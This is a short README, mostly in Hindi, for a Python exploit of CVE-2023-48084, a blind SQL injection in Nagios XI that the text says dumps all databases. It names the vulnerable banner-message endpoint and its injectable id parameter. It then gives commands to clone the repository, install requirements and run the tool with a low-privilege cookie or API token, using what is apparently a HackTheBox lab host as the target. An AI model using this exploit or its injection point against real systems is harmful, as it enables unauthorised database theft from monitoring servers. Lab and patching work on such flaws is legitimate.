
पायथन प्रोग्राम सभी डेटाबेस डंप करने के लिए, NagiosXI sqli कमजोरी का शोषण करते हुए
CVE-2023-48084 के लिए पायथन एक्सप्लॉइट -> Nagios XI before version 5.11.3 was discovered to contain a SQL injection vulnerability via the bulk modification tool.
एक्सप्लॉइट /admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(<SQL COMMAND TO EXECUTE>) का उपयोग करके SQL क्वेरी निष्पादित करता है, और एक ब्लाइंड SQL इंजेक्शन का शोषण करता है...
रिपॉजिटरी को क्लोन करें और requirements.txt इंस्टॉल करें
git clone https://github.com/Hamibubu/CVE-2023-48084.git
cd CVE-2023-48084
pip install -r requirements.txt
अब प्रोग्राम चलाएं, आपको एक गैर-व्यवस्थापक सत्र कुकी या एक API टोकन की आवश्यकता है, उदाहरण
python3 CVE-2023-48084.py --url https://monitored.htb/nagiosxi -a <token>
python3 CVE-2023-48084.py --url https://monitored.htb/nagiosxi -c <cookie>